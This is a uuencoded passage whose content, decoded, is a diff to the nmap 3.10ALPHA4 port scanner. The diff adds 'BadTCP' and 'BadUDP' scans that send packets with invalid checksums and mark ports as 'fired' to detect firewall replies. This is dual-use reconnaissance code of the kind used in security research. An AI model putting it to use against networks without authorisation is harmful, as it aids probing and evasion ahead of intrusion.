+M;F5S*5QN(@H@"2`B*B`M<T8L+7-8+"US3B!3=&5A;'1H($9)3BP@6&UA<RP@
+M;W(@3G5L;"!S8V%N("AE>'!E<G1S(&]N;'DI7&XB"B`)("(@("US4B\M22!2
+M4$,O261E;G1D('-C86X@*'5S92!W:71H(&]T:&5R('-C86X@='EP97,I7&XB
+M"D!`("TQ-#<V+#@@*S$T.#(L,3`@0$`*("`@8V%S92!!0TM?4T-!3CH@<F5T
+M=7)N(")!0TL@4V-A;B([(&)R96%K.PH@("!C87-E(%-93E]30T%..B!R971U
+M<FX@(E-93B!3=&5A;'1H(%-C86XB.R!B<F5A:SL*("`@8V%S92!&24Y?4T-!
+M3CH@<F5T=7)N(")&24X@4V-A;B([(&)R96%K.PHK("!C87-E($)!1%1#4%]3
+M0T%..B!R971U<FX@(D)A9%1#4"!38V%N(CL@8G)E86L["B`@(&-A<V4@6$U!
+M4U]30T%..B!R971U<FX@(EA-05,@4V-A;B([(&)R96%K.PH@("!C87-E(%5$
+M4%]30T%..B!R971U<FX@(E5$4"!38V%N(CL@8G)E86L["BL@(&-A<V4@0D%$
+M54107U-#04XZ(')E='5R;B`B0F%D5410(%-C86XB.R!B<F5A:SL*("`@8V%S
+M92!#3TY.14-47U-#04XZ(')E='5R;B`B0V]N;F5C="@I(%-C86XB.R!B<F5A
+M:SL*("`@8V%S92!.54Q,7U-#04XZ(')E='5R;B`B3E5,3"!38V%N(CL@8G)E
+M86L["B`@(&-A<V4@5TE.1$]77U-#04XZ(')E='5R;B`B5VEN9&]W(%-C86XB
+M.R!B<F5A:SL*0$`@+3$T.34L-B`K,34P,RPW($!`"B`@('-W:71C:"AS=&%T
+M92D@>PH@("!C87-E(%!/4E1?3U!%3CH@<F5T=7)N(")O<&5N(CL@8G)E86L[
+M"B`@(&-A<V4@4$]25%]&25)%5T%,3$5$.B!R971U<FX@(F9I;'1E<F5D(CL@
+M8G)E86L["BL@(&-A<V4@4$]25%]&25)%1#H@<F5T=7)N(")F:7)E9"([(&)R
+M96%K.PH@("!C87-E(%!/4E1?54Y&25)%5T%,3$5$.B!R971U<FX@(E5.9FEL
+M=&5R960B.R!B<F5A:SL*("`@8V%S92!03U)47T-,3U-%1#H@<F5T=7)N(")C
+M;&]S960B.R!B<F5A:SL*("`@9&5F875L=#H@<F5T=7)N(")U;FMN;W=N(CL@
+M8G)E86L["F1I9F8@+75R3F(@;FUA<"TS+C$P04Q02$$T+V]U='!U="YC8R!N
+M;6%P+3,N,3!!3%!(030M8F%D+V]U='!U="YC8PHM+2T@;FUA<"TS+C$P04Q0
+M2$$T+V]U='!U="YC8PE-;VX@4V5P("`Y(#`W.C4Y.C4Q(#(P,#(**RLK(&YM
+M87`M,RXQ,$%,4$A!-"UB860O;W5T<'5T+F-C"51H=2!$96,@,3(@,#<Z,C0Z
+M,#,@,C`P,@I`0"`M-#8X+#@@*S0V."PQ,B!`0`H@("`@(&1O<V-A;FEN9F\H
+M(FUA:6UO;B(L(")T8W`B+"!S8V%N;&ES="T^=&-P7W!O<G1S+"!S8V%N;&ES
+M="T^=&-P7V-O=6YT*3L*("`@:68@*&\N9FEN<V-A;BD@"B`@("`@9&]S8V%N
+M:6YF;R@B9FEN(BP@(G1C<"(L('-C86YL:7-T+3YT8W!?<&]R=',L('-C86YL
+M:7-T+3YT8W!?8V]U;G0I.PHK("!I9B`H;RYB861T8W!S8V%N*0HK("`@(&1O
+M<V-A;FEN9F\H(F)A9'1C<"(L(")T8W`B+"!S8V%N;&ES="T^=&-P7W!O<G1S
+M+"!S8V%N;&ES="T^=&-P7V-O=6YT*3L*("`@:68@*&\N=61P<V-A;BD@"B`@
+M("`@9&]S8V%N:6YF;R@B=61P(BP@(G5D<"(L('-C86YL:7-T+3YU9'!?<&]R
+M=',L('-C86YL:7-T+3YU9'!?8V]U;G0I.PHK("!I9B`H;RYB861U9'!S8V%N
+M*0HK("`@(&1O<V-A;FEN9F\H(F)A9'5D<"(L(")U9'`B+"!S8V%N;&ES="T^
+M=61P7W!O<G1S+"!S8V%N;&ES="T^=61P7V-O=6YT*3L*("`@:68@*&\N:7!P
+M<F]T<V-A;BD@"B`@("`@9&]S8V%N:6YF;R@B:7!P<F]T;R(L(")I<"(L('-C
+M86YL:7-T+3YP<F]T<RP@<V-A;FQI<W0M/G!R;W1?8V]U;G0I.R`*('T*9&EF
+M9B`M=7).8B!N;6%P+3,N,3!!3%!(030O<&]R=&QI<W0N8V,@;FUA<"TS+C$P
+M04Q02$$T+6)A9"]P;W)T;&ES="YC8PHM+2T@;FUA<"TS+C$P04Q02$$T+W!O
+M<G1L:7-T+F-C"4UO;B!.;W8@,3$@,3@Z,#,Z-#4@,C`P,@HK*RL@;FUA<"TS
+M+C$P04Q02$$T+6)A9"]P;W)T;&ES="YC8PE4:'4@1&5C(#$R(#`X.C0T.C(T
+M(#(P,#(*0$`@+3@U+#<@*S@U+#<@0$`*(`H@+RH@36%K92!S=7)E('-T871E
+M(&ES($]+("HO"B`@(&EF("AS=&%T92`A/2!03U)47T]014X@)B8@<W1A=&4@
+M(3T@4$]25%]#3$]3140@)B8@<W1A=&4@(3T@4$]25%]&25)%5T%,3$5$("8F
+M"BT@("`@("!S=&%T92`A/2!03U)47U5.1DE215=!3$Q%1"D**R`@("`@('-T
+M871E("$](%!/4E1?54Y&25)%5T%,3$5$("8F('-T871E("$](%!/4E1?1DE2
+M140@*0H@("`@(&9A=&%L*")A9&1P;W)T.B!A='1E;7!T('1O(&%D9"!P;W)T
+M(&YU;6)E<B`E9"!W:71H(&EL;&5G86P@<W1A=&4@)61<;B(L('!O<G1N;RP@
+M<W1A=&4I.PH@"B`@(&EF("AP<F]T;V-O;"`]/2!)4%!23U1/7U1#4"D@>PI`
+M0"`M,C8Q+#$R("LR-C$L,38@0$`*(`H@("!I9B`H<&QI<W0M/G-T871E7V-O
+M=6YT<UM03U)47T9)4D5704Q,141=(#X@,3`@*R`*("`@("`@($U!6"AP;&ES
+M="T^<W1A=&5?8V]U;G1S6U!/4E1?54Y&25)%5T%,3$5$72P@"BT)("!P;&ES
+M="T^<W1A=&5?8V]U;G1S6U!/4E1?0TQ/4T5$72DI('L**PD@('!L:7-T+3YS
+M=&%T95]C;W5N='-;4$]25%]#3$]3141=*W!L:7-T+3YS=&%T95]C;W5N='-;
+M4$]25%]&25)%1%TI*2!["B`@("`@<&QI<W0M/FEG;F]R961?<&]R=%]S=&%T
+M92`](%!/4E1?1DE215=!3$Q%1#L*("`@?2!E;'-E(&EF("AP;&ES="T^<W1A
+M=&5?8V]U;G1S6U!/4E1?54Y&25)%5T%,3$5$72`^(`HM"2`@("`@<&QI<W0M
+M/G-T871E7V-O=6YT<UM03U)47T-,3U-%1%TI('L**PD@("`@('!L:7-T+3YS
+M=&%T95]C;W5N='-;4$]25%]#3$]3141=*W!L:7-T+3YS=&%T95]C;W5N='-;
+M4$]25%]&25)%1%TI('L*("`@("!P;&ES="T^:6=N;W)E9%]P;W)T7W-T871E
+M(#T@4$]25%]53D9)4D5704Q,140["BT@('T@96QS92!P;&ES="T^:6=N;W)E
+M9%]P;W)T7W-T871E(#T@4$]25%]#3$]3140["BL@('T@96QS92!I9B`H<&QI
+M<W0M/G-T871E7V-O=6YT<UM03U)47T9)4D5$72`^('!L:7-T+3YS=&%T95]C
+M;W5N='-;4$]25%]#3$]3141=*2!["BL@("`@<&QI<W0M/FEG;F]R961?<&]R
+M=%]S=&%T92`](%!/4E1?1DE2140["BL@('T@96QS92!["BL@("`@<&QI<W0M
+M/FEG;F]R961?<&]R=%]S=&%T92`](%!/4E1?0TQ/4T5$.PHK("!]("`*('T*
+M(`H@"F1I9F8@+75R3F(@;FUA<"TS+C$P04Q02$$T+W!O<G1L:7-T+F@@;FUA
+M<"TS+C$P04Q02$$T+6)A9"]P;W)T;&ES="YH"BTM+2!N;6%P+3,N,3!!3%!(
+M030O<&]R=&QI<W0N:`E4=64@075G(#(W(#(Q.C0S.C(S(#(P,#(**RLK(&YM
+M87`M,RXQ,$%,4$A!-"UB860O<&]R=&QI<W0N:`E4:'4@1&5C(#$R(#`W.C(W
+M.C0W(#(P,#(*0$`@+34W+#<@*S4W+#@@0$`*("-D969I;F4@4$]25%]415-4
+M24Y'(#0*("-D969I;F4@4$]25%]&4D532"`U"B`C9&5F:6YE(%!/4E1?54Y&
+M25)%5T%,3$5$(#8*+2-D969I;F4@4$]25%](24=(15-47U-4051%(#<@+RH@
+M*BHJ24U03U)404Y4("TM($)535`@5$A)4R!54"!72$5.(%-4051%4R!!4D4@
+M"BLC9&5F:6YE(%!/4E1?1DE2140@-PHK(V1E9FEN92!03U)47TA)1TA%4U1?
+M4U1!5$4@."`O*B`J*BI)35!/4E1!3E0@+2T@0E5-4"!42$E3(%50(%=(14X@
+M4U1!5$53($%212`*(`D)"0E!1$1%1"`J*BH@*B\*("`*("-D969I;F4@0T].
+M1E].3TY%(#`*9&EF9B`M=7).8B!N;6%P+3,N,3!!3%!(030O<V-A;E]E;F=I
+M;F4N8V,@;FUA<"TS+C$P04Q02$$T+6)A9"]S8V%N7V5N9VEN92YC8PHM+2T@
+M;FUA<"TS+C$P04Q02$$T+W-C86Y?96YG:6YE+F-C"4UO;B!397`@,38@,#0Z
+M,SDZ-3@@,C`P,@HK*RL@;FUA<"TS+C$P04Q02$$T+6)A9"]S8V%N7V5N9VEN
+M92YC8PE-;VX@1&5C(#$V(#(R.C0V.C`S(#(P,#(*0$`@+3$S,CDL."`K,3,R
+M.2PY($!`"B`@(&5L<V4@:68@*'-C86YT>7!E(#T](%A-05-?4T-!3BD@<V-A
+M;F9L86=S(#T@5$A?1DE.?%1(7U521WQ42%]055-(.PH@("!E;'-E(&EF("AS
+M8V%N='EP92`]/2!.54Q,7U-#04XI('-C86YF;&%G<R`](#`["B`@(&5L<V4@
+M:68@*'-C86YT>7!E(#T]($9)3E]30T%.*2!S8V%N9FQA9W,@/2!42%]&24X[
+M"BL@(&5L<V4@:68@*'-C86YT>7!E(#T]($)!1%1#4%]30T%.*2!S8V%N9FQA
+M9W,@/2!42%]364X["B`@(&5L<V4@:68@*'-C86YT>7!E(#T]($U!24U/3E]3
+M0T%.*2!S8V%N9FQA9W,@/2!42%]&24Y\5$A?04-+.PHM("!E;'-E(&EF("AS
+M8V%N='EP92`A/2!51%!?4T-!3B`F)B!S8V%N='EP92`A/2!)4%!23U1?4T-!
+M3BD@>PHK("!E;'-E(&EF("AS8V%N='EP92$]54107U-#04X@)B8@<V-A;G1Y
+M<&4A/4E04%)/5%]30T%.("8F('-C86YT>7!E(3U"04151%!?4T-!3BD@>PH@
+M("`@(&9A=&%L*")5;FMN;W=N('-C86X@='EP92!F;W(@<W5P97)?<V-A;B(I
+M.R!]"B`*("`@<W1A<G1T:6UE(#T@=&EM92A.54Q,*3L*0$`@+3$S.3$L-R`K
+M,3,Y,BPW($!`"B`)"6YO=R`](&-U<G)E;G0M/G-E;G1;,5T["B`)"6EF("AO
+M+F9R86=S8V%N*0H@"0D@('-E;F1?<VUA;&Q?9G)A9WI?9&5C;WES*')A=W-D
+M+"!T87)G970M/G8T:&]S=&EP*"DL(#`L:2P@8W5R<F5N="T^<&]R=&YO+"!S
+M8V%N9FQA9W,I.PHM"0EE;'-E(&EF("AS8V%N='EP92`]/2!51%!?4T-!3BD*
+M*PD)96QS92!I9B`H<V-A;G1Y<&4]/55$4%]30T%.('Q\('-C86YT>7!E/3U"
+M04151%!?4T-!3BD*(`D)("!S96YD7W5D<%]R87=?9&5C;WES*')A=W-D+"!T
+M87)G970M/G8T:&]S=&EP*"DL(&DL"B`)"0D)("`@("`@8W5R<F5N="T^<&]R
+M=&YO+"!O+F5X=')A7W!A>6QO860L(&\N97AT<F%?<&%Y;&]A9%]L96YG=&@I
+M.PH@"0EE;'-E(&EF("AS8V%N='EP92`]/2!)4%!23U1?4T-!3BD*0$`@+3$T
+M,#$L-R`K,30P,BPW($!`"B`)"0D)("`@("`@8W5R<F5N="T^<&]R=&YO+"`P
+M+"`P+"!S8V%N9FQA9W,L(#`L($Y53$PL(#`L"B`)"0D)("`@("`@;RYE>'1R
+M85]P87EL;V%D+"!O+F5X=')A7W!A>6QO861?;&5N9W1H*3L*(`D):68@*'-E
+M;F1D96QA>2`F)@HM"0D@("`@*'-C86YT>7!E(#T](%5$4%]30T%.('Q\('-C
+M86YT>7!E(#T]($E04%)/5%]30T%.*2D**PD)("`@("AS8V%N='EP93T]5410
+M7U-#04X@?'P@<V-A;G1Y<&4]/4)!1%5$4%]30T%.('Q\('-C86YT>7!E/3U)
+M4%!23U1?4T-!3BDI"B`)"2`@=7-L965P*'-E;F1D96QA>2D["B`)("`@("`@
+M?0H@"2`@("!]"D!`("TQ-#(P+#<@*S$T,C$L-R!`0`H@"2`@("!G971T:6UE
+M;V9D87DH)F-U<G)E;G0M/G-E;G1;,%TL($Y53$PI.PH@"2`@("!I9B`H;RYF
+M<F%G<V-A;BD*(`D@("`@("!S96YD7W-M86QL7V9R86=Z7V1E8V]Y<RAR87=S
+M9"P@=&%R9V5T+3YV-&AO<W1I<"@I+"`P+"!O+FUA9VEC7W!O<G0L(&-U<G)E
+M;G0M/G!O<G1N;RP@<V-A;F9L86=S*3L*+0D@("`@96QS92!I9B`H<V-A;G1Y
+M<&4@/3T@54107U-#04XI"BL)("`@(&5L<V4@:68@*'-C86YT>7!E/3U51%!?
+M4T-!3B!\?"!S8V%N='EP93T]0D%$54107U-#04XI"B`)("`@("`@<V5N9%]U
+M9'!?<F%W7V1E8V]Y<RAR87=S9"P@=&%R9V5T+3YV-&AO<W1I<"@I+"!O+FUA
+M9VEC7W!O<G0L"B`)"0D)("!C=7)R96YT+3YP;W)T;F\L(&\N97AT<F%?<&%Y
+M;&]A9"P@;RYE>'1R85]P87EL;V%D7VQE;F=T:"D["B`)("`@(&5L<V4@:68@
+M*'-C86YT>7!E(#T]($E04%)/5%]30T%.*0I`0"`M,30S,"PW("LQ-#,Q+#<@
+M0$`*(`D@("`@("!S96YD7W1C<%]R87=?9&5C;WES*')A=W-D+"!T87)G970M
+M/G8T:&]S=&EP*"DL(&\N;6%G:6-?<&]R="P@"B`)"0D)("!C=7)R96YT+3YP
+M;W)T;F\L(#`L(#`L('-C86YF;&%G<RP@,"P@3E5,3"P@,"P*(`D)"0D@(&\N
+M97AT<F%?<&%Y;&]A9"P@;RYE>'1R85]P87EL;V%D7VQE;F=T:"D["BT)("`@
+M(&EF("@H<V-A;G1Y<&4@/3T@54107U-#04X@?'P@<V-A;G1Y<&4@/3T@25!0
+M4D]47U-#04XI("8F"BL)("`@(&EF("@H<V-A;G1Y<&4]/55$4%]30T%.('Q\
+M('-C86YT>7!E/3U"04151%!?4T-!3B!\?"!S8V%N='EP93T]25!04D]47U-#
+M04XI("8F"B`)"7-E;F1D96QA>2D*(`D@("`@("!U<VQE97`H<V5N9&1E;&%Y
+M*3L*(`D@('T*0$`@+3$T-C0L-B`K,30V-2PY($!`"B`)("`@("`@:68@*&EP
+M+3YI<%]P(#T]($E04%)/5$]?5$-0*2!["B`)"71C<"`]("AS=')U8W0@=&-P
+M:&1R("HI("@H*&-H87(@*BD@:7`I("L@-"`J(&EP+3YI<%]H;"D["B`)"6EF
+M("AT8W`M/G1H7V9L86=S("8@5$A?4E-4*2!["2`@("`**PD)("!I9B`H<V-A
+M;G1Y<&4@/3T@0D%$5$-07U-#04XI"BL)"2`@("!N97=S=&%T92`](%!/4E1?
+M1DE2140["BL)"2`@96QS90H@"0D@(&YE=W-T871E(#T@4$]25%]#3$]3140[
+M"B`)"2`@;F5W<&]R="`](&YT;VAS*'1C<"T^=&A?<W!O<G0I.PH@"0D@(&EF
+M("AP;W)T;&]O:W5P6VYE=W!O<G1=(#P@,"D@>PI`0"`M,34S-"PV("LQ-3,X
+M+#@@0$`*(`D)("!C87-E(#(Z("\J('!R,'0P8S!L('5N<F5A8VAA8FQE("HO
+M"B`)"2`@("!I9B`H<V-A;G1Y<&4@/3T@25!04D]47U-#04XI('L*(`D)("`@
+M("`@;F5W<W1A=&4@/2!03U)47T-,3U-%1#L**PD)("`@('T@96QS92!I9B`H
+M<V-A;G1Y<&4]/4)!1%5$4%]30T%.('Q\('-C86YT>7!E/3U"04140U!?4T-!
+M3BD@>PHK"0D@("`@("`@(&YE=W-T871E(#T@4$]25%]&25)%1#L*(`D)("`@
+M('T@96QS90H@"0D@("`@("!N97=S=&%T92`](%!/4E1?1DE215=!3$Q%1#L*
+M(`D)("`@(&)R96%K.PI`0"`M,34T,2PQ,B`K,34T-RPQ."!`0`H@"0D@(&-A
+M<V4@,SH@+RH@<#!R="!U;G)E86-H86)L92`J+PD)"B`)"2`@("!I9B`H<V-A
+M;G1Y<&4@/3T@54107U-#04XI('L*(`D)("`@("`@;F5W<W1A=&4@/2!03U)4
+M7T-,3U-%1#L*+0D)("`@('T@96QS92!N97=S=&%T92`](%!/4E1?1DE215=!
+M3$Q%1#L**PD)("`@('T@96QS92!I9B`H<V-A;G1Y<&4]/4)!1%5$4%]30T%.
+M('Q\('-C86YT>7!E/3U"04140U!?4T-!3BD@>PHK"0D@("`@("`@(&YE=W-T
+M871E(#T@4$]25%]&25)%1#L**PD)("`@('T@96QS90HK"0D@("`@("`@(&YE
+M=W-T871E(#T@4$]25%]&25)%5T%,3$5$.PH@"0D@("`@8G)E86L["B`)"2`@
+M"B`)"2`@8V%S92`Y.@H@"0D@(&-A<V4@,3`Z"B`)"2`@8V%S92`Q,SH@+RH@
+M061M:6YI<W1R871I=F5L>2!P<F]H:6)I=&5D('!A8VME="`J+PHK"0D@("`@
+M:68@*'-C86YT>7!E/3U"04151%!?4T-!3B!\?"!S8V%N='EP93T]0D%$5$-0
+M7U-#04XI"BL)"2`@("`@(&YE=W-T871E(#T@4$]25%]&25)%1#L**PD)("`@
+M(&5L<V4*(`D)("`@(&YE=W-T871E(#T@4$]25%]&25)%5T%,3$5$.PH@"0D@
+M("`@8G)E86L["0D*(`D)("`*0$`@+3$U-S(L-R`K,34X-"PW($!`"B`)("`@
+M("`@?0H@"2`@("`*(`D@("`@("!I9B`H8W5R<F5N="D@>PD@(`HM"0EI9B`H
+M8W5R<F5N="T^<W1A=&4@/3T@4$]25%]#3$]3140@)B8@*'!A8VME=%]T<GEN
+M=6T@/"`P*2D@>PHK"0EI9B`H*&-U<G)E;G0M/G-T871E/3U03U)47T-,3U-%
+M1"!\?"!C=7)R96YT+3YS=&%T93T]4$]25%]&25)%1"D@)B8@*'!A8VME=%]T
+M<GEN=6T@/"`P*2D@>PH@"0D@('1A<F=E="T^=&\N<G1T=F%R(#T@*&EN="D@
+M*'1A<F=E="T^=&\N<G1T=F%R("H@,2XR*3L*(`D)("!I9B`H;RYD96)U9V=I
+M;F<I('L@;&]G7W=R:71E*$Q/1U]35$1/550L("),871E('!A8VME="P@8V]U
+M;&1N)W0@9FEG=7)E(&]U="!S96YD;F\@<V\@=V4@9&\@=F%R:6%N8V5I;F-R
+M96%S92!T;R`E9%QN(BP@=&%R9V5T+3YT;RYR='1V87(I.R`*(`D)("!]"D!`
+M("TQ-3@X+#<@*S$V,#`L-R!`0`H@"0D@("`@("!I9B`H(7-E;F1D96QA>2D@
+M<V5N9&1E;&%Y(#T@-3`P,#`["B`)"2`@("`@(&5L<V4@<V5N9&1E;&%Y(#T@
+M34E.*'-E;F1D96QA>2`J(#(L(#$P,#`P,#`I.PH@"0D@("`@("!I9B`H<V5N
+M9&1E;&%Y(#X](#(P,#`P,"`F)@HM"0D)("`H<V-A;G1Y<&4@/3T@54107U-#
+M04X@?'P@<V-A;G1Y<&4@/3T@25!04D]47U-#04XI*0HK"0D)("`H<V-A;G1Y
+M<&4]/55$4%]30T%.('Q\('-C86YT>7!E/3U"04151%!?4T-!3B!\?"!S8V%N
+M='EP93T]25!04D]47U-#04XI*0H@"0D);6%X7W=I9'1H(#T@34E.*&UA>%]W
+M:61T:"PR*3L*(`D)("`@("`@9G)E<VAP;W)T<W1R:65D(#T@,#L*(`D)("`@
+M("`@9')O<'!E9"`](#`["D!`("TQ-3DY+#<@*S$V,3$L-R!`0`H@"0D@("`@
+M("!N=6UQ=65R:65S7VED96%L(#T@34%8*&UI;E]W:61T:"P@;G5M<75E<FEE
+M<U]I9&5A;"`J(&9A;&QB86-K7W!E<F-E;G0I.PH@"0D@("`@("!I9B`H;RYD
+M96)U9V=I;F<I('L@;&]G7W=R:71E*$Q/1U]35$1/550L("),;W-T(&$@<&%C
+M:V5T+"!D96-R96%S:6YG('=I;F1O=R!T;R`E9%QN(BP@*&EN="D@;G5M<75E
+M<FEE<U]I9&5A;"D["B`)"2`@("`@('=I;F1O=V1E8W)E87-E*RL["BT)"2`@
+M("`@(&EF("AS8V%N='EP92`]/2!51%!?4T-!3B!\?"!S8V%N='EP92`]/2!)
+M4%!23U1?4T-!3BD**PD)("`@("`@:68@*'-C86YT>7!E/3U51%!?4T-!3B!\
+M?"!S8V%N='EP93T]0D%$54107U-#04X@?'P@<V-A;G1Y<&4]/4E04%)/5%]3
+M0T%.*0H@"0D)=7-L965P*#(U,#`P,"D["B`)"2`@("`@('T*(`D)("`@('T@
+M96QS92!I9B`H;RYD96)U9V=I;F<@/B`Q*2![(`I`0"`M,38Q,"PW("LQ-C(R
+M+#<@0$`*(`D):68@*&-U<G)E;G0M/G-T871E("$](&YE=W-T871E*2!["B`)
+M"2`@8VAA;F=E9"LK.PH@"0E]"BT)"6EF("AC=7)R96YT+3YS=&%T92`A/2!0
+M3U)47T]014X@)B8@"BL)"6EF("AC=7)R96YT+3YS=&%T92`A/2!03U)47T]0
+M14X@)B8@8W5R<F5N="T^<W1A=&4@(3T@4$]25%]&25)%1"`F)B`*(`D)("`@
+M(&-U<G)E;G0M/G-T871E("$](%!/4E1?0TQ/4T5$*2!["2`@("`*(`D)("!N
+M=6UQ=65R:65S7V]U='-T86YD:6YG+2T["B`)"7T*0$`@+3$V,C,L-R`K,38S
+M-2PW($!`"B`)"6-U<G)E;G0M/FYE>'0@/2!C=7)R96YT+3YP<F5V(#T@+3$[
+M"B`)"6-U<G)E;G0M/G-T871E(#T@;F5W<W1A=&4["B`)"6%D9'!O<G0H)G1A
+M<F=E="T^<&]R=',L(&-U<G)E;G0M/G!O<G1N;RP@"BT)"0DH<V-A;G1Y<&4@
+M/3T@54107U-#04XI/R!)4%!23U1/7U5$4"`Z"BL)"0DH<V-A;G1Y<&4]/55$
+M4%]30T%.('Q\('-C86YT>7!E/3U"04151%!?4T-!3BD_($E04%)/5$]?5410
+M(#H*(`D)"2`@*'-C86YT>7!E(#T]($E04%)/5%]30T%./R!)4%!23U1/7TE0
+M.B!)4%!23U1/7U1#4"DL(`H@"0D)3E5,3"P@8W5R<F5N="T^<W1A=&4I.PH@
+M"2`@("`@('T*0$`@+3$V,S@L-B`K,38U,"PY($!`"B`@("`@("!C=7)R96YT
+M+3YS=&%T92`](%!/4E1?1E)%4T@["B`@("`@("!C=7)R96YT+3YT<GEN=6T@
+M/2`P.PH@("`@("`@:68@*&\N9&5B=6=G:6YG*2![(`HK("`@("`@("!I9B`H
+M;RYB861C:W-U;3T],2D**PD@(&QO9U]W<FET92A,3T=?4U1$3U54+"`B54YF
+M:6QT97)E9"!P;W)T("5L=2!N;W1E9%QN(BP@8W5R<F5N="T^<&]R=&YO*3L@
+M"BL)96QS92`*(`EL;V=?=W)I=&4H3$]'7U-41$]55"P@(E!R97!A<FEN9R!F
+M;W(@<F5T<GDL(&]P96X@<&]R="`E;'4@;F]T961<;B(L(&-U<G)E;G0M/G!O
+M<G1N;RD[(`H@("`@("`@?0H@("`@('T*0$`@+3$V-#8L,3(@*S$V-C$L,34@
+M0$`*("`@("!N=6UQ=65R:65S7VED96%L(#T@:6YI=&EA;%]P86-K971?=VED
+M=&@["B`@("`@:68@*&\N9&5B=6=G:6YG*0H@("`@("`@;&]G7W=R:71E*$Q/
+M1U]35$1/550L(")$;VYE('=I=&@@<F]U;F0@)61<;B(L('1R:65S*3L*+2`@
+M("!I9B`H<V-A;G1Y<&4@/3T@54107U-#04X@)B8@8VAA;F=E9"`F)B`H=')I
+M97,@*R`Q*2`\(#$P,"D@>PHK("`@(&EF("@H<V-A;G1Y<&4]/55$4%]30T%.
+M('Q\('-C86YT>7!E/3U"04151%!?4T-!3BD@)B8@8VAA;F=E9"`F)B`H=')I
+M97,@*R`Q*2`\(#$P,"D@>PH@("`@("`@:68@*&\N9&5B=6=G:6YG*2!["B`)
+M;&]G7W=R:71E*$Q/1U]35$1/550L(")3;&5E<&EN9R!F;W(@,2\R('-E8V]N
+M9"!T;R!O=F5R8V]M92!)0TU0(&5R<F]R(')A=&4@;&EM:71I;F=<;B(I.PH@
+M("`@("`@?0H@("`@("`@=7-L965P*#4P,#`P,"D["B`@("`@?0HK("`@(&EF
+M("@H<V-A;G1Y<&4]/4)!1%1#4%]30T%.('Q\('-C86YT>7!E/3U"04151%!?
+M4T-!3BD@)B8@=')I97,^/3`I"BL@("`@("!B<F5A:SL**R`@("`@(`H@("!]
+M('=H:6QE*&-H86YG960@)B8@*RMT<FEE<R`\(#$P,"D[("`@"B`*("`@;W!E
+M;FQI<W0@/2!T97-T:6YG;&ES=#L*0$`@+3$V-C(L-R`K,38X,"PQ,2!`0`H@
+M("!F;W(@*&-U<G)E;G0@/2!O<&5N;&ES=#L@8W5R<F5N=#L@(&-U<G)E;G0@
+M/2`H8W5R<F5N="T^;F5X="`^/2`P*3\@)G-C86Y;8W5R<F5N="T^;F5X=%T@
+M.B!.54Q,*2!["B`@("`@:68@*'-C86YT>7!E(#T]($E04%)/5%]30T%.*0H@
+M("`@("`@861D<&]R="@F=&%R9V5T+3YP;W)T<RP@8W5R<F5N="T^<&]R=&YO
+M+"!)4%!23U1/7TE0+"!.54Q,+"!03U)47T]014XI.PHM("`@(&5L<V4@:68@
+M*'-C86YT>7!E("$](%5$4%]30T%.*0HK("`@(&5L<V4@:68@*'-C86YT>7!E
+M(#T]($)!1%1#4%]30T%.*0HK("`@("`@861D<&]R="@F=&%R9V5T+3YP;W)T
+M<RP@8W5R<F5N="T^<&]R=&YO+"!)4%!23U1/7U1#4"P@3E5,3"P@4$]25%]5
+M3D9)4D5704Q,140I.PHK("`@(&5L<V4@:68@*'-C86YT>7!E(#T]($)!1%5$
+M4%]30T%.*0HK("`@("`@861D<&]R="@F=&%R9V5T+3YP;W)T<RP@8W5R<F5N
+M="T^<&]R=&YO+"!)4%!23U1/7U5$4"P@3E5,3"P@4$]25%]53D9)4D5704Q,
+M140I.PHK("`@(&5L<V4@:68@*'-C86YT>7!E(3U51%!?4T-!3BD*("`@("`@
+M(&%D9'!O<G0H)G1A<F=E="T^<&]R=',L(&-U<G)E;G0M/G!O<G1N;RP@25!0
+M4D]43U]40U`L($Y53$PL(%!/4E1?3U!%3BD["B`@("`@96QS90H@("`@("`@
+M861D<&]R="@F=&%R9V5T+3YP;W)T<RP@8W5R<F5N="T^<&]R=&YO+"!)4%!2
+M3U1/7U5$4"P@3E5,3"P@4$]25%]/4$5.*3L*0$`@+3$V-S0L-B`K,38Y-BPQ
+M,R!`0`H@("!C;&]S92AR87=S9"D["B`@('!C87!?8VQO<V4H<&0I.PH@"BL@
+M(&EF("AO+F)A9&-K<W5M/C`I"BL@('LO*B!297-E="!C;W)R96-T(&-K<W5M
+M(&9O<B!O=&AE<B!O<'1I;VYS(&QI:V4@+4\@*B\**R`@("!O+F)A9&-K<W5M
+M*RL["BL@("`@:68@*&\N=F5R8F]S92`F)B!T87)G970M/G!O<G1S+G-T871E
+M7V-O=6YT<UM03U)47U5.1DE215=!3$Q%1%T]/6YU;7!O<G1S*0HK("`@("`@
+M97)R;W(H(BAN;R!F:7)E=V%L;"!R97!L>2!D971E8W1E9"DB*3L**R`@?0HK
+M("`*("`@+RH@4W5P97(@<V-A;B!R96QI97,@;VX@=7,@<F5C96EV:6YG(&$@
+M<F5S<&]N<V4@:68@=&AE('!O<G0@:7,*("`@("`@0TQ/4T5$(&%N9"!N;R!R
+M97-P;VYS92!I9B!T:&4@<&]R="!I<R!/4$5.+B`@02!P<F]B;&5M('=I=&@*
+M("`@("`@=&AI<R!I<R!T:&%T('=H96X@82!M86-H:6YE(&ES(&1O:6YG(&AE
+M879Y(&9I;'1E<FEN9RP@86QL('!O<G1S"D!`("TQ-C@Q+#<@*S$W,3`L-R!`
+M0`H@("`@("!P;W)T<R!W97)E('-C86YN960@86YD('1H97D@87)E($%,3"!C
+M;VYS:61E<F5D(&]P96X@8GD@=&AI<PH@("`@("!F=6YC=&EO;BP@=&AE;B!I
+M="!I<R!R96%S;VYA8FQY('1O(&%S<W5M92!T:&%T('1H92!214%,(')E87-O
+M;@H@("`@("!T:&5Y(&%R92!A;&P@;W!E;B!I<R!T:&%T('1H97D@:&%V92!B
+M965N(&9I;'1E<F5D+B`J+PHM("!I9B`H;G5M<&]R=',@/B`R-2D@>R`@("`*
+M*R`@96QS92!I9B`H;G5M<&]R=',@/B`R-2D@>R`@("`*("`@("!I9B`H<V-A
+M;G1Y<&4@/3T@54107U-#04XI('L*("`@("`@(&EF("AT87)G970M/G!O<G1S
+M+G-T871E7V-O=6YT<U]U9'!;4$]25%]/4$5.72`]/2!N=6UP;W)T<RD@>PH@
+M"6EF("AO+G9E<F)O<V4I('L@"F1I9F8@+75R3F(@;FUA<"TS+C$P04Q02$$T
+M+W1A<F=E=',N8V,@;FUA<"TS+C$P04Q02$$T+6)A9"]T87)G971S+F-C"BTM
+M+2!N;6%P+3,N,3!!3%!(030O=&%R9V5T<RYC8PE3=6X@4V5P("`X(#(R.C4V
